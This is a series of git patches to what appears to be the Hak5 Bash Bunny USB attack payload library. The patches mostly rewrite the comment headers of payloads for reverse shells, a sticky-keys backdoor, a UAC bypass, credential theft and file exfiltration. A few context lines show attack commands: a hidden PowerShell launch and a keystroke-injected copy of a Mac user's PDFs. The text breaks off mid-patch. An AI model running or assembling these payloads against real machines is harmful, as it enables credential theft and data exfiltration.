From 1e1e9cfcb1c753b841ad64028ac0241ee7bc00b6 Mon Sep 17 00:00:00 2001 From: Marc Date: Fri, 5 Jul 2019 08:02:57 +0100 Subject: [PATCH 01/22] Cleanup: RAZ_VBScript: Update Payload Header --- .../library/execution/RAZ_VBScript/payload.txt | 16 +++++++--------- 1 file changed, 7 insertions(+), 9 deletions(-) diff --git a/payloads/library/execution/RAZ_VBScript/payload.txt b/payloads/library/execution/RAZ_VBScript/payload.txt index 1383e370..ba13b4fc 100644 --- a/payloads/library/execution/RAZ_VBScript/payload.txt +++ b/payloads/library/execution/RAZ_VBScript/payload.txt @@ -4,17 +4,15 @@ # Author: RalphyZ # Version: 1.1a # Target: Windows 7+ -# Dependencies: VBScript (a.vbs) in the switch folder with this file +# Dependencies: Included a.vbs script # # Description: Executes a VBScript, concealed in a hidden PowerShell window # -# Colors: -# | Status | Color | Description | -# | ---------- | ------------------------------| ------------------------------------------------ | -# | SETUP | Magenta solid | Setting attack mode, getting the switch position | -# | FAIL | Red slow blink | Could not find the a.vbs script | -# | ATTACK | Yellow single blink | Running the VBScript | -# | FINISH | Green blink followed by SOLID | Script is finished | +# LEDS: +# Magenta: Setting attack mode, getting the switch position +# Red Blink: Could not find the a.vbs script +# Yellow Single Blink: Running the VBScript +# Green Blink to Solid: Script is finished # Magenta solid LED SETUP @@ -43,4 +41,4 @@ QUACK ENTER # Green 1000ms VERYFAST blink followed by SOLID LED FINISH -exit 0 \ No newline at end of file +exit 0 From 759b114db909c844c5cfc9344ca53d265e08e369 Mon Sep 17 00:00:00 2001 From: Marc Date: Fri, 5 Jul 2019 08:05:28 +0100 Subject: [PATCH 02/22] Cleanup: RevShellBack: Update Payload Header --- payloads/library/execution/RevShellBack/payload.txt | 11 +++++++++-- 1 file changed, 9 insertions(+), 2 deletions(-) diff --git a/payloads/library/execution/RevShellBack/payload.txt b/payloads/library/execution/RevShellBack/payload.txt index 674c71e0..2292346f 100644 --- a/payloads/library/execution/RevShellBack/payload.txt +++ b/payloads/library/execution/RevShellBack/payload.txt @@ -1,12 +1,19 @@ #!/bin/bash # # Title: RevShellBack -# Description: Set up a reverse shell and execute powershell/generic commands in the background from the Bash Bunny via USB ethernet. # Author: NodePoint # Version: 0.1.3 # Category: Execution # Target: Windows -# Attackmodes: Ethernet, HID +# Attack Modes: RNDIS_ETHERNET, HID +# Description: Set up a reverse shell and execute powershell/generic commands in the background from the Bash Bunny via USB ethernet. +# +# LEDS: +# Magenta: Setup +# Yellow Single Blink: Open CMD +# Yellow Double Blink: Start Reverse Shell +# Cyan Blink: Attack +# Green: Finished # Set attack mode LED SETUP From 37de2446e36fd75050ff1df71b4df100d4b59049 Mon Sep 17 00:00:00 2001 From: Marc Date: Fri, 5 Jul 2019 08:07:06 +0100 Subject: [PATCH 03/22] Cleanup: ShellExec: Update Payload Header --- .../library/execution/ShellExec/payload.txt | 18 +++++++++--------- 1 file changed, 9 insertions(+), 9 deletions(-) diff --git a/payloads/library/execution/ShellExec/payload.txt b/payloads/library/execution/ShellExec/payload.txt index 500f2f93..07470f95 100644 --- a/payloads/library/execution/ShellExec/payload.txt +++ b/payloads/library/execution/ShellExec/payload.txt @@ -2,17 +2,17 @@ # Title: ShellExec # Author: audibleblink -# Target: Mac/Linux +# Target: Mac, Linux # Version: 1.1 +# Attack Modes: ECM_ETHERNET, HID +# Description: Create a web server on the BashBunny and force the victim to download and execute a script. +# Perfect for when mass storage isn't an option. # -# Create a web server on the BashBunny and force -# the victim to download and execute a script. -# Perfect for when mass storage isn't an option. -# -# White | Ready -# Ammber blinking | Waiting for server -# Blue blinking | Attacking -# Green | Finished +# LEDS: +# White: Ready +# Amber Blink: Waiting for server +# Blue Blink: Attacking +# Green: Finished LED SETUP ATTACKMODE ECM_ETHERNET HID VID_0X05AC PID_0X021E From 17ef1c009951b64501f29277109f1385cf395951 Mon Sep 17 00:00:00 2001 From: Marc Date: Fri, 5 Jul 2019 08:08:50 +0100 Subject: [PATCH 04/22] Cleanup: StickyBunny: Update Payload Header --- .../library/execution/StickyBunny/payload.txt | 20 ++++++++++--------- 1 file changed, 11 insertions(+), 9 deletions(-) diff --git a/payloads/library/execution/StickyBunny/payload.txt b/payloads/library/execution/StickyBunny/payload.txt index 8ea53f50..76abf693 100644 --- a/payloads/library/execution/StickyBunny/payload.txt +++ b/payloads/library/execution/StickyBunny/payload.txt @@ -1,15 +1,17 @@ #!/bin/bash # -# Title: StickyBunny -# Author: Squibs -# Version: 0.3 -# Plug2Pwn: 18s +# Title: StickyBunny +# Author: Squibs +# Version: 0.3 +# Attack Modes: HID +# Target: Windows +# Runtime: 18s +# Description: Creates the sticky keys back door on a windows machine # -# Creates the sticky keys back door on a windows machine -# -# Blue...............Preparing Attack -# Yellow.............Attacking -# Green..............GTFO +# LEDS: +# Blue: Preparing Attack +# Yellow: Attacking +# Green: Finished #Open Admin Powershell ATTACKMODE HID From 5e1dbdb4895d192f1b54121ecaea7337bd4882be Mon Sep 17 00:00:00 2001 From: Marc Date: Fri, 5 Jul 2019 08:12:17 +0100 Subject: [PATCH 05/22] Cleanup: exe_UACBypassD&E: Update Payload Header --- .../execution/exe_UACBypassD&E/payload.txt | 23 +++++++++++++------ 1 file changed, 16 insertions(+), 7 deletions(-) diff --git a/payloads/library/execution/exe_UACBypassD&E/payload.txt b/payloads/library/execution/exe_UACBypassD&E/payload.txt index a37dc4a8..1d7fcc98 100644 --- a/payloads/library/execution/exe_UACBypassD&E/payload.txt +++ b/payloads/library/execution/exe_UACBypassD&E/payload.txt @@ -1,14 +1,24 @@ -# Title: UACBypass -# Author: Skiddie -# Version: 1.1 -# Target: Windows +# Title: UACBypass +# Author: Skiddie +# Version: 1.1 +# Target: Windows +# Attack Modes: HID, STORAGE # -# Description: Download and executes any binary executable with administrator privileges WITHOUT prompting the user for administrator rights (aka UAC bypass/exploit). Please define URL and SAVEFILENAME in the a.vbs script. Target does need internet connection. Works on Windows 7 - Windows 10. The UAC bypass was patched in Win10 V.1607, the file will still execute but with normal user privliges. However from what i am aware version 7,8 and 8.1 are still effected. Currently fastest download and execute for HID attacks to date. (with UAC bypass) +# Description: Download and executes any binary executable with administrator privileges WITHOUT prompting +# the user for administrator rights (aka UAC bypass/exploit). Please define URL and SAVEFILENAME +# in the a.vbs script. Target does need internet connection. Works on Windows 7 - Windows 10. +# The UAC bypass was patched in Win10 V.1607, the file will still execute but with normal user privliges. +# However from what I am aware version 7,8 and 8.1 are still effected. +# Currently fastest download and execute for HID attacks to date. (with UAC bypass) +# +# LEDS: +# Magenta: Starting +# Green: Finished #Define your bunny storage stick name DRIVER_LABEL='BashBunny' -#RED means starting +#Magenta means starting LED SETUP #Gets File locations @@ -17,7 +27,6 @@ GET SWITCH_POSITION #We are a keyboard ATTACKMODE HID STORAGE - QUACK DELAY 500 RUN WIN powershell -windowstyle hidden ".((gwmi win32_volume -f 'label=''$DRIVER_LABEL''').Name+'payloads\\$SWITCH_POSITION\a.vbs')" QUACK DELAY 1000 From a764a9e2388cfd176f88e0502fdbe8c2903f9508 Mon Sep 17 00:00:00 2001 From: Marc Date: Fri, 5 Jul 2019 08:14:54 +0100 Subject: [PATCH 06/22] Cleanup: psh_DownloadExec: Update Payload Header --- .../execution/psh_DownloadExec/payload.txt | 17 ++++++++--------- 1 file changed, 8 insertions(+), 9 deletions(-) diff --git a/payloads/library/execution/psh_DownloadExec/payload.txt b/payloads/library/execution/psh_DownloadExec/payload.txt index bddd3cdf..479635ad 100644 --- a/payloads/library/execution/psh_DownloadExec/payload.txt +++ b/payloads/library/execution/psh_DownloadExec/payload.txt @@ -4,18 +4,17 @@ # Author: LowValueTarget # Version: 1.2 # Category: Powershell -# Target: Windows XP SP3+ (Powershell) +# Target: Windows XP SP3+ # Attackmodes: HID, RNDIS_ETHERNET # Firmware: >= 1.3 +# Description: Quick HID attack to retrieve and run powershell payload from BashBunny web server. +# Ensure p.txt (your powershell payload) exists in payload directory # -# Quick HID attack to retrieve and run powershell payload from BashBunny web server -# ensure p.txt (your powershell payload) exists in payload directory -# -# | Attack Stage | Description | -# | ------------------- | ---------------------------------------- | -# | Stage 1 | Running Initial Powershell Commands | -# | Stage 2 | Delivering powershell payload | -# +# LEDS: +# Yellow Single Blink: Running Initial Powershell Commands +# Yellow Double Blink: Delivering powershell payload +# Green: Finished +# Red Blink: Failure ATTACKMODE RNDIS_ETHERNET HID LED SETUP From 377a5bc7b4d69f46c48ab69477611b846012ea3a Mon Sep 17 00:00:00 2001 From: Marc Date: Fri, 5 Jul 2019 08:17:50 +0100 Subject: [PATCH 07/22] Cleanup: psh_DownloadExecSMB: Update Payload Header Also Fix left over merge errors.. --- .../execution/psh_DownloadExecSMB/payload.txt | 30 ++++++++----------- 1 file changed, 13 insertions(+), 17 deletions(-) diff --git a/payloads/library/execution/psh_DownloadExecSMB/payload.txt b/payloads/library/execution/psh_DownloadExecSMB/payload.txt index 8d127475..bc0eb902 100644 --- a/payloads/library/execution/psh_DownloadExecSMB/payload.txt +++ b/payloads/library/execution/psh_DownloadExecSMB/payload.txt @@ -4,26 +4,22 @@ # Author: LowValueTarget # Version: 2.0 # Category: Powershell -# Target: Windows XP SP3+ (Powershell) -# Attackmodes: HID, RNDIS_ETHERNET +# Target: Windows XP SP3+ +# Attack Modes: HID, RNDIS_ETHERNET # Firmware: >= 1.2 +# Required Tools: impacket +# Description: Quick HID attack to retrieve and run powershell payload from BashBunny SMBServer. +# Possibilities are limitless! Credentials captured by are stored as loot. +# Ensure p.txt exists in payload directory (using .txt instead of .ps1 in case of security countermeasures) # -# Quick HID attack to retrieve and run powershell payload from BashBunny SMBServer. Possibilities are limitless! -# Credentials captured by are stored as loot. -# Ensure p.txt exists in payload directory (using .txt instead of .ps1 in case of security countermeasures) -# -# Required tools: impacket -======= -# Credentials captured by are stored as loot. -# Ensure p.txt exists in payload directory (using .txt instead of .ps1 in case of security countermeasures) -# -# Required tools: impacket -# -# | Attack Stage | Description | -# | ------------------- | ------------------------------| -# | Stage 1 | Powershell | -# | Stage 2 | Delivering powershell payload | +# LEDS: +# Magenta: Setup +# Yellow Single Blink: Powershell +# Yellow Double Blink: Delivering powershell payload +# White: Clean up +# Green: Finished # + ATTACKMODE RNDIS_ETHERNET HID # SETUP From 6295445794b612f5dad2645476b43dcfa81f7858 Mon Sep 17 00:00:00 2001 From: Marc Date: Fri, 5 Jul 2019 08:21:31 +0100 Subject: [PATCH 08/22] Cleanup: BlackBackup: Update Payload Header Also move shebang to top of file. --- .../exfiltration/BlackBackup/payload.txt | 23 ++++++++++--------- 1 file changed, 12 insertions(+), 11 deletions(-) diff --git a/payloads/library/exfiltration/BlackBackup/payload.txt b/payloads/library/exfiltration/BlackBackup/payload.txt index 640b687d..eabefdfc 100644 --- a/payloads/library/exfiltration/BlackBackup/payload.txt +++ b/payloads/library/exfiltration/BlackBackup/payload.txt @@ -1,16 +1,17 @@ -# Title: BlackBackup -# Author: JWHeuver & JBaselier -# Version: 1.0 -# -# Runs powershell script to get Wlan and logon credentials -# from computer and save them on USB drive (Storage attack) -# -# Purple.............Loading -# Green .............Execute Credential Ripper Powershell -# Off................Finished -# #!/bin/bash +# Title: BlackBackup +# Author: JWHeuver & JBaselier +# Version: 1.0 +# Description: Runs powershell script to get Wlan and logon credentials +# from computer and save them on USB drive (Storage attack) +# +# LEDS: +# Purple: Loading +# Green: Execute Credential Ripper Powershell +# Off: Finished +# + # OPTIONS - More options available in the Powershell payload OBFUSCATECMD="N" # Y=yes or N=no From d92eef0e32c329a86368b5ef9174f25073818941 Mon Sep 17 00:00:00 2001 From: Marc Date: Fri, 5 Jul 2019 08:24:15 +0100 Subject: [PATCH 09/22] Cleanup: browserData: Update Payload Header --- .../exfiltration/browserData/payload.txt | 20 +++++++++---------- 1 file changed, 10 insertions(+), 10 deletions(-) diff --git a/payloads/library/exfiltration/browserData/payload.txt b/payloads/library/exfiltration/browserData/payload.txt index 9f60c3ef..29424ac6 100755 --- a/payloads/library/exfiltration/browserData/payload.txt +++ b/payloads/library/exfiltration/browserData/payload.txt @@ -2,16 +2,17 @@ # # Title: BrowserData # Author: zachstanford -# Version: 0.1 (Tested on Windows 10) +# Version: 0.1 +# Targets: Windows +# Attack Modes: HID, STORAGE +# Description: Dumps browser info like history and bookmarks from powershell script +# then saves them in /root/udisk/loot/BrowserData/%ComputerName% +# Credits to this Empire's powershell script: +# https://github.com/EmpireProject/Empire/blob/master/data/module_source/collection/Get-BrowserData.ps1 # -# Dumps browser info like history and bookmarks from powershell script -# then saves them in /root/udisk/loot/BrowserData/%ComputerName% -# Credits to this Empire's powershell script: -# https://github.com/EmpireProject/Empire/blob/master/data/module_source/collection/Get-BrowserData.ps1 - -#script -# Blue...............Running Script -# Purple.............Finished +# LEDS: +# Blue: Running Script +# Magenta: Finished # Not sure if this is the right variable. Feel free to change it. @@ -23,7 +24,6 @@ LED R SLOW LOOTDIR=/root/udisk/loot/BrowserData mkdir -p $LOOTDIR - LED B SLOW # wait 6 seconds for the storage to popup From f451511363a9802bc852609ff3df1780966da684 Mon Sep 17 00:00:00 2001 From: Marc Date: Fri, 5 Jul 2019 08:28:18 +0100 Subject: [PATCH 10/22] Cleanup: dropbox-exfiltrator: Update Payload Header --- .../exfiltration/dropbox-exfiltrator/payload.txt | 15 ++++++++++----- 1 file changed, 10 insertions(+), 5 deletions(-) diff --git a/payloads/library/exfiltration/dropbox-exfiltrator/payload.txt b/payloads/library/exfiltration/dropbox-exfiltrator/payload.txt index 033e3f8b..fc36f243 100644 --- a/payloads/library/exfiltration/dropbox-exfiltrator/payload.txt +++ b/payloads/library/exfiltration/dropbox-exfiltrator/payload.txt @@ -1,9 +1,14 @@ -# Dropbox Exfiltrator +# Title: Dropbox Exfiltrator # Author: Hak5Darren -# Props: jimcola99 Buchanan -# Demo: Hak5 episode 2505 -# Target: Windows Vista+ -# Category: Exfiltration +# Props: jimcola99 Buchanan +# Demo: Hak5 Episode 2505 +# Targets: Windows +# Description: Exfiltrate via DropBox +# +# LEDS: +# Magenta: Setup +# Yellow Blink: Getting Script +# Green: Finish LED SETUP ATTACKMODE HID From 5b146829365adf9060a7c9e1aec535a520f65960 Mon Sep 17 00:00:00 2001 From: Marc Date: Fri, 5 Jul 2019 08:28:52 +0100 Subject: [PATCH 11/22] Cleanup: dropbox-exfiltrator: Update Payload Header --- payloads/library/exfiltration/dropbox-exfiltrator/payload.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/payloads/library/exfiltration/dropbox-exfiltrator/payload.txt b/payloads/library/exfiltration/dropbox-exfiltrator/payload.txt index fc36f243..bbce1a1c 100644 --- a/payloads/library/exfiltration/dropbox-exfiltrator/payload.txt +++ b/payloads/library/exfiltration/dropbox-exfiltrator/payload.txt @@ -1,6 +1,6 @@ # Title: Dropbox Exfiltrator # Author: Hak5Darren -# Props: jimcola99 Buchanan +# Props: jimcola99, Buchanan # Demo: Hak5 Episode 2505 # Targets: Windows # Description: Exfiltrate via DropBox From 937ecc7e8bff56a2e8b47fcb74f60a1fa551557e Mon Sep 17 00:00:00 2001 From: Marc Date: Fri, 5 Jul 2019 08:31:49 +0100 Subject: [PATCH 12/22] Cleanup: FileInfoExfil: Update Payload Header --- .../exfiltration/FileInfoExfil/payload.txt | 40 ++++++++----------- 1 file changed, 16 insertions(+), 24 deletions(-) diff --git a/payloads/library/exfiltration/FileInfoExfil/payload.txt b/payloads/library/exfiltration/FileInfoExfil/payload.txt index b0854cf4..5652be57 100644 --- a/payloads/library/exfiltration/FileInfoExfil/payload.txt +++ b/payloads/library/exfiltration/FileInfoExfil/payload.txt @@ -1,18 +1,21 @@ -#Title: FileInfoExfiltrator -#Author: A_SarcasticGuy -#Version: 1.0 -#Target: Windows +#!/bin/bash + +# Title: FileInfoExfiltrator +# Author: A_SarcasticGuy +# Version: 1.0 +# Attack Modes: HID, STORAGE +# Targets: Windows +# Description: Runs Powershell that calls a .ps1 file to scan (in all subdirectories of path provided) +# for all files (by default starting on c:/) beginning with a #specific phrase (default "pass*") +# to then be outputted to a text file in the loot directory, in a subfolder with the name of the +# system and with a file name of the date and time of the scan. +# NOTE: p.ps1 MUST be in loot/payloads/ for this to work. # -#Runs Powershell that calls a .ps1 file to scan (in all subdirectories of path provided) for all files (by default starting on c:/) beginning with a #specific phrase (default "pass*") to then #be outputted to a text file in the loot directory, in a subfolder with the name of the system and with a #file name of the date and time of the scan. +# LEDS +# Magenta: Script Started +# Yellow: Ducky Script Started +# Red: Failed to run Ducky Script, see log file # -# Options: Search Directory: Find in p.bat (default c:/) -# Search criteria: Find in p.bat (default "pass*") -# -# Purple LED..................Script Started -# Yellow LED..................Ducky Script Started -# Red LED.....................Failed to run Ducky Script, see log file -# -# NOTE: p.ps1 MUST be in loot/payloads/ for this to work. # LED SETUP @@ -23,29 +26,18 @@ ATTACKMODE HID STORAGE if [ -f "/root/udisk/payloads/${SWITCH_POSITION}/ducky_script.txt" ]; then - #Call ducky script LED STAGE1 - QUACK ${SWITCH_POSITION}/ducky_script.txt - - QUACK DELAY 10000 - LED FINISH else - LED FAIL - - #Red LED if unable to load script echo "Unable to load ducky_script.txt" >> /root/debuglog.txt - exit 1 - - fi From b2731e7e97154e4df8428c90cdd971031ae09599 Mon Sep 17 00:00:00 2001 From: Marc Date: Fri, 5 Jul 2019 08:33:46 +0100 Subject: [PATCH 13/22] Cleanup: ftp_exfiltrator: Update Payload Header --- .../exfiltration/ftp_exfiltrator/payload.txt | 24 +++++++++---------- 1 file changed, 11 insertions(+), 13 deletions(-) diff --git a/payloads/library/exfiltration/ftp_exfiltrator/payload.txt b/payloads/library/exfiltration/ftp_exfiltrator/payload.txt index f2bc2b59..6d3b1cbb 100644 --- a/payloads/library/exfiltration/ftp_exfiltrator/payload.txt +++ b/payloads/library/exfiltration/ftp_exfiltrator/payload.txt @@ -1,19 +1,17 @@ #!/bin/bash # -# Title: FTP Exfiltrator -# Author: Nutt -# Version: 1.0 -# Target: Windows +# Title: FTP Exfiltrator +# Author: Nutt +# Version: 1.0 +# Targets: Windows +# Description: Exfiltrates files from the users Documents folder FTP's all files/folders to a specified +# FTP site named by the victim hostname. Powershell FTP script will stay running after +# BashBunny is unpluggedonce light turns green unplug and check FTP site. # -#Exfiltrates files from the users Documents folder -#FTP's all files/folders to a specified FTP site named by the victim hostname. -#Powershell FTP script will stay running after BashBunny is unplugged, once light turns green unplug and check FTP site. - -#Executes 1.ps1 - -#Purple.........Setup -#Red............Failed - Need to work on -#Green..........Finished +# LEDS: +# Purple: Setup +# Red: Failed - Need to work on +# Green: Finished LED SETUP GET SWITCH_POSITION From 83e57026399e68ad80506b3d099248bb95557834 Mon Sep 17 00:00:00 2001 From: Marc Date: Fri, 5 Jul 2019 08:35:47 +0100 Subject: [PATCH 14/22] Cleanup: MacPDFExfil: Update Payload Header --- payloads/library/exfiltration/MacPDFExfil/payload.txt | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/payloads/library/exfiltration/MacPDFExfil/payload.txt b/payloads/library/exfiltration/MacPDFExfil/payload.txt index d74275db..30f135ba 100644 --- a/payloads/library/exfiltration/MacPDFExfil/payload.txt +++ b/payloads/library/exfiltration/MacPDFExfil/payload.txt @@ -4,9 +4,9 @@ # Author: k1ul3ss # Props: audibleblink # Version: 1.0 -# Category: Exfiltration -# Target: macOS -# Attackmodes: HID, Storage +# Targets: macOS +# Attack Modes: HID, Storage +# Description: Finds all PDFs in the users Home directory, and then copies them to the Bunnys storage. ATTACKMODE STORAGE HID VID_0X05AC PID_0X021E @@ -28,4 +28,4 @@ QUACK STRING find \~ -name \'*.pdf\' -exec cp \"{}\" $lootdir \\\;\; killall Ter QUACK ENTER # sync the filesystem -sync \ No newline at end of file +sync From f214a3adf9ac1982b05d9062775e69a64ad0c079 Mon Sep 17 00:00:00 2001 From: Marc Date: Fri, 5 Jul 2019 08:39:26 +0100 Subject: [PATCH 15/22] Cleanup: optical-exfiltration: Update Payload Header --- .../optical-exfiltration/payload.txt | 43 ++++++++----------- 1 file changed, 17 insertions(+), 26 deletions(-) diff --git a/payloads/library/exfiltration/optical-exfiltration/payload.txt b/payloads/library/exfiltration/optical-exfiltration/payload.txt index 6f70b5df..99f33306 100755 --- a/payloads/library/exfiltration/optical-exfiltration/payload.txt +++ b/payloads/library/exfiltration/optical-exfiltration/payload.txt @@ -1,31 +1,22 @@ #!/bin/bash # -# Title: Optical Exfiltration -# Author: bg-wa -# Version: 1.0 -# Category: HID -# Target: *NIX -# Attackmodes: HID -# Sources: Hak5 2320, https://github.com/bg-wa/QRExtractor +# Title: Optical Exfiltration +# Author: bg-wa +# Version: 1.0 +# Targets: macOS, Linux +# Attack Modes: HID +# Sources: Hak5 2320, https://github.com/bg-wa/QRExtractor +# Description: Quick HID only attack to write an HTML/JS file to target machine +# and open a browser, to exfiltrate data Using QR Codes and a video recording device. +# Optional html params: +# base64: Passing a base64 string to this param will auto-start processing QR Codes. +# playback: Passing the string "finish" to this param will auto-play the results, when QR codes finish rendering. +# Example: Ln65: Q STRING firefox "$target_html?playback=finish&base64=my_long_string" # -# Quick HID only attack to write an HTML/JS file to target machine -# and open a browser, to exfiltrate data Using QR Codes and a video -# recording device. -# -# Optional html params: -# base64: Passing a base64 string to this param will auto-start processing QR Codes. -# -# playback: Passing the string "finish" to this param will auto-play the results, -# when QR codes finish rendering. -# -# Example: -# Ln65: Q STRING firefox "$target_html?playback=finish&base64=my_long_string" -# -# | Attack Stage | Description | -# | ------------------- | ---------------------------------------- | -# | SETUP | Open vi | -# | ATTACK | Writing HTML | -# | FINISH | Browser Ready/Processing | +# LEDS: +# Magenta: Open vi +# Yellow Blink: Writing HTML +# Green: Browser Ready/Processing # ATTACKMODE HID @@ -65,4 +56,4 @@ Q ENTER Q STRING firefox "$target_html" Q ENTER -LED FINISH \ No newline at end of file +LED FINISH From 4ecfbf665e4656a7938db587898293ddd35f8171 Mon Sep 17 00:00:00 2001 From: Marc Date: Fri, 5 Jul 2019 08:41:35 +0100 Subject: [PATCH 16/22] Cleanup: Powershell_TCP_Extractor: Update Payload Header --- .../exfiltration/Powershell_TCP_Extractor/payload.txt | 11 ++++++++--- 1 file changed, 8 insertions(+), 3 deletions(-) diff --git a/payloads/library/exfiltration/Powershell_TCP_Extractor/payload.txt b/payloads/library/exfiltration/Powershell_TCP_Extractor/payload.txt index b5553363..2a27d33b 100644 --- a/payloads/library/exfiltration/Powershell_TCP_Extractor/payload.txt +++ b/payloads/library/exfiltration/Powershell_TCP_Extractor/payload.txt @@ -3,10 +3,15 @@ # Title: Powershell Extractor # Author: $irLurk$alot # Version: 1.0 -# Target: Windows +# Targets: Windows +# Attack Modes: HID, STORAGE +# Description: Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition, +# which in turn runs powershell script to copy move and extract data. # -# Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition, -# which in turn runs powershell script to copy move and extract data. +# LEDS: +# Magenta: Setting Up +# Yellow Blink: Executing Powershell +# Green: Finished LED SETUP From 1839f3e760240c1df689a30dee5dcc37e85186ac Mon Sep 17 00:00:00 2001 From: Marc Date: Fri, 5 Jul 2019 20:26:38 +0100 Subject: [PATCH 17/22] Cleanup: simple-usb-extractor: Add Payload Header --- .../exfiltration/simple-usb-extractor/payload.txt | 14 +++++++++++++- 1 file changed, 13 insertions(+), 1 deletion(-) diff --git a/payloads/library/exfiltration/simple-usb-extractor/payload.txt b/payloads/library/exfiltration/simple-usb-extractor/payload.txt index d3d434be..8f8de431 100644 --- a/payloads/library/exfiltration/simple-usb-extractor/payload.txt +++ b/payloads/library/exfiltration/simple-usb-extractor/payload.txt @@ -1,4 +1,16 @@ -# Executes z.cmd from the switch position's folder, thus launching x.cmd silently using i.vbs +#!/bin/bash +# +# Title: simple-usb-extractor +# Version: 1.0 +# Author: danthegoodman1 +# Targets: Windows +# Attack Modes: HID, STORAGE +# Description: Executes z.cmd from the switch position's folder, thus launching x.cmd silently using i.vbs +# +# LEDS: +# Yellow Blink - Attacking +# Green - Finished + GET SWITCH_POSITION LED ATTACK ATTACKMODE HID STORAGE From 3b368fe23e433c1854a26535455cd823b85a62fb Mon Sep 17 00:00:00 2001 From: Marc Date: Fri, 5 Jul 2019 20:28:25 +0100 Subject: [PATCH 18/22] Cleanup: SmacAndGrab: Update Payload Header --- payloads/library/exfiltration/SmacAndGrab/payload.txt | 11 ++++++----- 1 file changed, 6 insertions(+), 5 deletions(-) diff --git a/payloads/library/exfiltration/SmacAndGrab/payload.txt b/payloads/library/exfiltration/SmacAndGrab/payload.txt index a78f1fc5..f33ccb1d 100644 --- a/payloads/library/exfiltration/SmacAndGrab/payload.txt +++ b/payloads/library/exfiltration/SmacAndGrab/payload.txt @@ -2,13 +2,14 @@ # # Title: sMacAndGrab # Author: audibleblink -# Target: macOS +# Targets: macOS # Version: 1.2 +# Attack Modes: STORAGE, HID +# Description: Backup a list of files from macOS # -# Backup a list of files from macOS -# -# Yellow (blinking)...Attacking -# Green...............Finished +# LEDS: +# Yellow Blink: Attacking +# Green: Finished LED ATTACK ATTACKMODE STORAGE HID VID_0X05AC PID_0X021E From 20ca26ee74db3d11fbde7e98501febc1caaba4e7 Mon Sep 17 00:00:00 2001 From: Marc Date: Fri, 5 Jul 2019 20:31:53 +0100 Subject: [PATCH 19/22] Cleanup: SmartFileExtract: Update Payload Header --- .../SmartFileExtract_Exfiltrator/payload.txt | 22 ++++++++++--------- 1 file changed, 12 insertions(+), 10 deletions(-) diff --git a/payloads/library/exfiltration/SmartFileExtract_Exfiltrator/payload.txt b/payloads/library/exfiltration/SmartFileExtract_Exfiltrator/payload.txt index 613546a8..8c5d9d09 100644 --- a/payloads/library/exfiltration/SmartFileExtract_Exfiltrator/payload.txt +++ b/payloads/library/exfiltration/SmartFileExtract_Exfiltrator/payload.txt @@ -1,16 +1,18 @@ #!/bin/bash # -# Title: ExecutableInstaller -# Author: IMcPwn (original) -# Additions: SaintCrossbow (only for the parts to run SFE) -# Version: 1.0 -# Target: Windows 7+ -# -# Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition, -# which in turn executes e.cmd invisibly using i.vbs -# which in turn copies payload.exe from the root of the Bash Bunny and then executes it -# using the --startup parameter. Change these settings inside of e.cmd. +# Title: SmartFileExtract +# Author: IMcPwn +# Props: SaintCrossbow +# Version: 1.0 +# Targets: Windows +# Description: Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition, +# which in turn executes e.cmd invisibly using i.vbs +# which in turn copies payload.exe from the root of the Bash Bunny and then executes it +# using the --startup parameter. Change these settings inside of e.cmd. # +# LEDS: +# Red: Attacking +# Green: Finished # Source bunny_helpers.sh to get environment variable SWITCH_POSITION source bunny_helpers.sh From e3c4e45e29d5e044444783d59663a259132bd2f4 Mon Sep 17 00:00:00 2001 From: Marc Date: Fri, 5 Jul 2019 20:35:15 +0100 Subject: [PATCH 20/22] Cleanup: smb_exfiltrator: Update Payload Header --- .../exfiltration/smb_exfiltrator/payload.txt | 53 +++++-------------- 1 file changed, 13 insertions(+), 40 deletions(-) diff --git a/payloads/library/exfiltration/smb_exfiltrator/payload.txt b/payloads/library/exfiltration/smb_exfiltrator/payload.txt index 4509d283..1db30d9a 100644 --- a/payloads/library/exfiltration/smb_exfiltrator/payload.txt +++ b/payloads/library/exfiltration/smb_exfiltrator/payload.txt @@ -4,47 +4,20 @@ # Author: Hak5Darren # Props: ImNatho, mike111b, madbuda # Version: 1.1 -# Category: Exfiltration -# Target: Windows XP SP3+ (Powershell) -# Attackmodes: HID, Ethernet +# Target: Windows XP +# Attack Modes: HID, RNDIS_ETHERNET +# Requires: Impacket Tool +# Description: Exfiltrates select files from users's documents folder via SMB. +# Liberated documents will reside in Bash Bunny loot directory under +# loot/smb_exfiltrator/HOSTNAME/DATE_TIME. Exfiltration options configured from included s.ps1 script. # -# CHANGELOG -# ========= -# Rewrite of the original SMB Exfiltrator payload with: -# - Faster copying, using robocopy multithreaded mode -# - Faster finish, using a EXFILTRATION_COMPLETE file -# - Offload logic to target PC for accurate date/time -# - Clears tracks by default without second run dialog -# - Test-Connection handling by ICMP (no lame sleeps) -# - Hidden powershell window by default -# -# REQUIREMENTS -# ============ -# Needs impacket to be copied to /tools/impacket and installed -# Option A: -# 1. Download impacket from https://github.com/CoreSecurity/impacket -# 2. Copy impacket folder to /tools on the Bash Bunny flash drive -# 3. Boot Bash Bunny into arming mode and connect to console via serial -# 4. Issue "python /tools/impacket/setup.py install" -# Option B: -# 1. Download impacket deb package -# 2. Copy impacket.deb to /tools on the Bash Bunny flash drive -# 3. Boot Bash Bunny into arming mode. Impacket will install automatically. -# -# LED STATUS -# ========== -# FAIL........Failed to find dependencies -# STAGE1......HID Stage -# STAGE2......Ethernet Stage -# SPECIAL.....Receiving Files -# CLEANUP.....Moving Liberated Files -# FINISH......Finished -# -# OPTIONS -# ======= -# Exfiltration options configured from included s.ps1 script - - +# LEDS: +# Red: Failed to find dependencies +# Yellow Single Blink: HID Stage +# Yellow Double Blink: Ethernet Stage +# Cyan: Receiving Files +# White: Moving Liberated Files +# Green: Finished ######## INITIALIZATION ######## REQUIRETOOL impacket From 342a2299c4accf669a4bd67f4795eedc053aa32c Mon Sep 17 00:00:00 2001 From: Marc Date: Fri, 5 Jul 2019 20:36:52 +0100 Subject: [PATCH 21/22] Cleanup: usb_exfiltrator: Update Payload Header --- .../exfiltration/usb_exfiltrator/payload.txt | 14 ++++++++------ 1 file changed, 8 insertions(+), 6 deletions(-) diff --git a/payloads/library/exfiltration/usb_exfiltrator/payload.txt b/payloads/library/exfiltration/usb_exfiltrator/payload.txt index 